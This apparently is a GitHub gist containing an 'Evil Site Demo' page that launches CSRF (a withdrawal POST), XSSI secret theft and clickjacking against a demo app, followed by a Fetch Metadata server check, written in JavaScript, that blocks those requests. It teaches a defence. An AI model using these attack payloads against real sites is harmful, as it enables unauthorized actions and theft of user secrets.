@lweichselbaum
Last active June 14, 2023 09:36
<!DOCTYPE html>
<html>
<head>
<title>Evil Site</title>
</head>
<body bgcolor="red">
<h2>Evil Site Demo</h2>
<!-- deduct via XSRF -->
<form action="https://secmetadata.appspot.com/api/csrf?amount=10&action=withdraw" method="POST"><input type="submit"/></form>
<!-- Steal secret via XSSI (cross-site script inclusion) -->
<script src="https://secmetadata.appspot.com/api/xssi"> </script>
<!-- Clickjacking -->
<iframe src="https://secmetadata.appspot.com/api/frame"></iframe>
</body>
</html>
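All three requests this page issues are cross-site, which a server can recognise from the Fetch Metadata request headers (`Sec-Fetch-Site`, `Sec-Fetch-Mode`, `Sec-Fetch-Dest`) that supporting browsers attach. The following server-side resource isolation check is an added example, not part of the gist or of the target application's code; `allowRequest`, `evaluateSamples` and the sample header values are constructed for illustration.

```javascript
// Added example (not from the gist): Fetch Metadata resource isolation check.
// allowRequest() and the sample requests are constructed for illustration.
function allowRequest(req) {
  const h = req.headers; // header names lower-cased, as Node.js delivers them
  const site = h['sec-fetch-site'];
  // No header: browser without Fetch Metadata support. Let the request through
  // and rely on the other defenses (CSRF tokens, frame-ancestors, ...).
  if (site === undefined) return true;
  // Same-origin, same-site and direct user navigations (typed URL, bookmark).
  if (site === 'same-origin' || site === 'same-site' || site === 'none') return true;
  // Cross-site: only a plain top-level GET navigation (a followed link) is served.
  // This rejects cross-site POSTs, script loads and framing.
  return req.method === 'GET' &&
         h['sec-fetch-mode'] === 'navigate' &&
         h['sec-fetch-dest'] === 'document';
}

// Constructed samples: the first three mirror what a browser would send for the
// form, script and iframe elements on the demo page; the last two are legitimate.
const cross = (mode, dest) => ({
  'sec-fetch-site': 'cross-site', 'sec-fetch-mode': mode, 'sec-fetch-dest': dest,
});
const SAMPLE_REQUESTS = [
  { name: 'cross-site form POST', method: 'POST',
    path: '/api/csrf?amount=10&action=withdraw', headers: cross('navigate', 'document') },
  { name: 'cross-site script include', method: 'GET',
    path: '/api/xssi', headers: cross('no-cors', 'script') },
  { name: 'cross-site iframe', method: 'GET',
    path: '/api/frame', headers: cross('navigate', 'iframe') },
  { name: 'same-origin POST', method: 'POST',
    path: '/api/csrf?amount=10&action=withdraw',
    headers: { 'sec-fetch-site': 'same-origin', 'sec-fetch-mode': 'cors', 'sec-fetch-dest': 'empty' } },
  { name: 'cross-site link click', method: 'GET',
    path: '/', headers: cross('navigate', 'document') },
];

// Returns one { name, allowed } verdict per sample request.
function evaluateSamples() {
  return SAMPLE_REQUESTS.map((r) => ({ name: r.name, allowed: allowRequest(r) }));
}

for (const r of evaluateSamples()) {
  console.log(`${r.allowed ? 'ALLOW' : 'BLOCK'}  ${r.name}`);
}
```

A request rejected by the check would typically receive a 403 response before any state change or secret-bearing response body is produced.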